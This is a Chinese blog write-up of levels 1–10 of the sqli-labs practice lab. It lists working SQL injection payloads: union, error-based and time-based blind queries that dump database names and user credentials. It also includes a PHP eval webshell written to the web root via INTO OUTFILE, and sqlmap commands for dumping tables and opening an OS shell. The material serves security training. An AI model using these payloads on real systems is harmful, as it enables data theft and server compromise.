Sqlilab(1~10)闯关记录

最新推荐文章于 2023-07-16 17:19:49 发布
最新推荐文章于 2023-07-16 17:19:49 发布
阅读量367 收藏
点赞数
文章标签: 数据库 安全性测试 sql 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56375711/article/details/128161800
版权

第一关(字符型注入,使用联合查询爆表)

url为http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1' 时,发现页面回显报错,根据报错信息说明url中的单引号很可能闭合了后台sql语句中的单引号,所以继续在url后面加上--+或#注释掉后面的sql查询语句.

url为http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1'--+时,页面正常显示,说明单引号被闭合。

 url为http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1'and 1=2--+,页面没有回显,找到注入点

http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1' order by 3--+页面正常,http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1' order by 4--+页面报错

说明列数为3

url为http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=-1' union select 1,2,3--+ 页面回显2和3,说明可以在2和3处脱裤。

接下来就是常用的爆数据的payload:

爆所有库
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+

爆所有表
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+

爆所有列
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security'),3--+

爆数据
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(concat(username,0x7e,password)) from security.users),3--+

效果如下:

http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+

http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+

 

 

 http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security'),3--+

 http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(concat(username,0x7e,password)) from security.users),3--+

 

 第二关(数字型注入,联合查询数据库名称)

http://127.0.0.1/sqli-labs/sqli-labs-master/Less-2/?id=1 and 1=1  正常回显

http://127.0.0.1/sqli-labs/sqli-labs-master/Less-2/?id=1 and 1=2 没有回显  初步判断为数字型注入并且找到了注入点

 http://127.0.0.1/sqli-labs/sqli-labs-master/Less-2/?id=-1 union select 1,2,3

判断列数为3

 payload:(效果和less1相同,这里就不一一展示)

爆所有库
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+

爆所有表
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+

爆所有列
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security'),3--+

爆数据
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(concat(username,0x7e,password)) from security.users),3--+

 第三关(   ')闭合  联合注入   )

http://127.0.0.1/sqli-labs/sqli-labs-master/Less-3/?id=1') --+ 

成功闭合('   页面正常回显 

http://127.0.0.1/sqli-labs/sqli-labs-master/Less-3/?id=1') and 1=2 --+

 http://127.0.0.1/sqli-labs/sqli-labs-master/Less-2/?id=-1') union select 1,2,3

判断列数为3  找到注入点 

payload:

爆所有库
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-3/?id=-1') union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+

爆所有表
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-3/?id=-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+

爆所有列
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-3/?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security'),3--+

爆数据
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-3/?id=-1') union select 1,(select group_concat(concat(username,0x7e,password)) from security.users),3--+

 第四关(   ")闭合  联合注入  )

http://127.0.0.1/sqli-labs/sqli-labs-master/Less-4/?id=1") and 1=1 --+  正常回显

http://127.0.0.1/sqli-labs/sqli-labs-master/Less-4/?id=1") and 1=2 --+  无回显

http://127.0.0.1/sqli-labs/sqli-labs-master/Less-4/?id=-1") union select 1,2,3 --+

判断列数为3 且 在2和3位置有输出,得到注入点

payload:

爆所有库
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-4/?id=-1") union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+

爆所有表
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-4/?id=-1") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+

爆所有列
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-4/?id=-1") union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security'),3--+

爆数据
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-4/?id=-1") union select 1,(select group_concat(concat(username,0x7e,password)) from security.users),3--+

 第五关(单引号闭合  报错注入)

http://127.0.0.1/sqli-labs/sqli-labs-master/Less-5/?id=1' and 1=1 --+ 正常回显

http://127.0.0.1/sqli-labs/sqli-labs-master/Less-5/?id=1' and 1=2 --+ 无回显

 

此时观察到回显处无想要的输出位置,所以这关使用报错注入

http://127.0.0.1/sqli-labs/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1) --+  成功爆出数据库名称

 payload:

爆当前库中的表
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1)-- +

爆user表中的列
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,31),0x7e),1)-- +

爆列中的数据
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),1,31),0x7e),1)-- +
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),32,31),0x7e),1)-- +
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),63,31),0x7e),1)-- +

第六关(双引号闭合 报错注入)

和第五关一样,唯一不同的就是第五关用单引号闭合,第六关用双引号闭合。

payload:

爆当前库中的表
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-6/?id=1"%20and%20updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1)-- +

爆user表中的列
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-6/?id=1"%20and%20updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,31),0x7e),1)-- +

爆列中的数据
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-6/?id=1"%20and%20updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),1,31),0x7e),1)-- +
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-6/?id=1"%20and%20updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),32,31),0x7e),1)-- +
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-6/?id=1"%20and%20updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),63,31),0x7e),1)-- +

第七关(无回显 一句话木马)

 http://127.0.0.1/sqli-labs/sqli-labs-master/Less-7/?id=1')) --+  

多次尝试发现是'))闭合(此处可以使用脚本爆破)

观察页面没有回显,所以使用一句话木马注入

payload:

一句话木马
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-7/?id=1')) union select 1,2,"<?php @eval($_POST['a']); ?>" into outfile "E:\\system_software\\phpstudy\\phpstudy_pro\\WWW\\sqli-labs\\sqli-labs-master\\Less-7\\less7.php" --+

右下角提醒威胁,因为自己写了木马

 第八关(单引号闭合  无回显  一句话木马)

第八关和第七关思路相同,唯一不同就是使用单引号进行闭合

http://127.0.0.1/sqli-labs/sqli-labs-master/Less-8/?id=1' --+ 正常回显

payload:

一句话木马
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-8/?id=1' union select 1,2,"<?php @eval($_POST['a']); ?>" into outfile "E:\\system_software\\phpstudy\\phpstudy_pro\\WWW\\sqli-labs\\sqli-labs-master\\Less-8\\less8.php" --+

 第九关(无回显  时间盲注)

观察无论id=1还是id=-1,结果都是这个界面,所以不能用布尔盲注,此题使用时间盲注 

payload:

http://127.0.0.1/sqli-labs/sqli-labs-master/Less-9/?id=1' and if(length(database())=8,sleep(5),1) --+

页面5秒后加载成功  说明数据库长度为8

 第十关(无回显  使用sqlmap)

今天的最后一关就练习一下sqlmap工具的使用

#获取所有数据库名称
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --dbs
#获取当前数据库
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --current-db
#获取数据库security所有表名称
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --tables -D security
#获取数据库security的users表的所有列名
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --columns -D security -T users
#获取数据库security的users表的username和password列的值
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --dump -D security -T users -C username,password
#写马
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --os-shell

 

 

m0_56375711
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlilab1-10记录
ckkkk__d的博客
03-26 161
如果增加一个’反引号使id=‘$id’闭合则剩一个’ 被注释后(--+ || --%20||%23),中间部分即可任由我们操作。首先查数据库表名从information的schema库的tables中查找当前数据库名下的表。分析该片段以及键入?最后查询users表中的username与password。后在4时出现报错提示,可以得出表一共有3列。函数在使用时前后列数需要一致故进行第二步。后出现2,3可以判断23位置为回显点。分别查询数据库版本与数据库名。没有报错则说明可以注入。使用联合输出表名即可解决。
Sql-lab全解_sqllab,给后辈的一点建议
最新发布
m0_60721649的博客
04-08 859
引起报错的是0x7e这里也就是~符号,这里回显会执行后面的select语句同时以报错的方式回显表名:?表列:?结果:?
Sqlilab教程
weixin_62281892的博客
05-17 1576
第一:基于单引号的字符型注入 目录 第一:基于单引号的字符型注入 先进行输入参数?id=1' 出现报错说明发现注入点,判断该类型为字符注入 order by 判断数据库--表--表里面的数据的列进行排序(从1开始) union select 1,2,3 -- 判断数据显示点 select system_user() 显示系统用户 select version() 显示版本信息 select @@datadir 数据库的安装路径 *查库: select schema_na
Sqli-Lab靶场-基础篇笔记
Pr0m1se1n的博客
11-26 1284
SQL注入之联合查询注入&报错注入&SQL文件读取文件写入&盲注
Sqlilab记录(11~20)(白盒测试)
m0_56375711的博客
12-05 785
Sqlilab记录(11~20)(白盒测试)
sqlilabs1-20详细教程
黑白的博客
10-06 8183
声明 学习SQL注入 information_schema 过之前先要了解一下,我们要研究的是SQL注入,所以有必要先了解一下MYSQL数据库的重要库(表集合):information_schema,这个库中,存在着所有数据库的信息。。。这就意味着,如果我们可以利用漏洞,仅仅去查询这个库,就可以拿到于数据库的大量信息了。 先看一下,这个数据库的位置 SCHEMATA 该表记录着所有的数据库名 图中,mysql命令行输入如喜爱命令,会显示目前为止所有的数据库(图左1) show databases;
Sqli-lab教程-史上最全详解(1-22通
qq_52364123的博客
04-10 8704
sql注入集合
sqli-lib64笔记学习资料.zip
08-22
《sqli-labs-1-65閫氬叧鏁欑▼share(by sm0nk).md》这个文件很可能包含了作者sm0nk在完成sqli-lib64所有65的过程中所记录的笔记和技巧。通过阅读这份文档,你可以了解到每个卡的键思路、解题方法以及可能遇到...
dvwa+sqlilab+burp+phpstudy所需安装包.rar
11-08
搭建phpstudy环境,并在phpstudy环境下搭建sqlilab和dvwa,安装dvwa 具体配置详见https://blog.csdn.net/qq_37077262/article/details/102945140
sqli-lab注入练习源码
06-25
Sqli-lab是一个专门设计用于SQL注入学习和实践的平台,它为初学者和经验丰富的安全专家提供了多种级别的练习,帮助他们了解并掌握如何防止这种攻击。 首先,我们来详细了解SQL注入的基本原理。当Web应用程序接收...
sqli_1-10_My.py
06-19
sqli 基于时间盲注的脚本文件 1-10 全部适用。通过修改url便可以进行注入。
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
sqlilab学习打卡|手工注入|Less46-Less65
spring!
04-06 3696
sqlilab学习打卡|手工注入|Less46-Less65
sqli-labs 1-10(GET型注入)新手通详解(高手误入)
b1n的博客
07-16 2896
1.第一是单引号字符型注入2.用--+进行注释,页面正常显示。
sqlilab第一
qq_45491497的博客
07-28 1986
1.判断注入方式为字符型 输入正常id=1 注入引号 可以推断查询语句为select * from users where id=1 limit 0,1; (ps:users表只是举例) 打开第一的php源码查看结果 打开数据库命令行查询结果 2.查询库名 <1>判断表有几列 当输入order by 3时未报错,而order by 4报错,说明表有三列 <2>判断回显的位置 为了union后的语句可生效,需将之前的报错,改为-1 se.
SqliLab_Mysql_Injection详解_字符型注入(三)_布尔盲注/报错注入(6)
qq_41260930的博客
10-20 556
SqlLab_Mysql_Injection详解_字符型注入(四) SQL注入_布尔盲注 SQL注入_报错注入 原理 由于服务器在接受请求后,返回的页面存在报错提示的情况,可以使用一些特殊的函数在特殊的情况下,返回所想要获取的数据库信息; 常用的函数: UPDATEXML(XML_document,XPath_string,new_value)函数 第一个参数XML_document:XML_d...
sqli-labs 基础篇 第8~10
Lucky小小吴的小屋
01-13 478
sqli-labs 基础篇 第8、9、10
sqli-labs1-10心得与思路
m0_48294281的博客
03-08 6103
sqli-labs 1-11个人心得,欢迎交流指正。
sqlilab学习打卡|手工注入|Less23-Less31
spring!
04-02 1486
sqlilab学习打卡|手工注入|Less23-Less31
sqli-labs-master 游戏
03-16
sqli-labs-master是一款用于学习SQL注入攻击技巧的游戏,其中包含了若干卡,每个卡都涉及到了不同类型的SQL注入攻击。通过玩这个游戏,玩家可以学到如何识别和防御SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值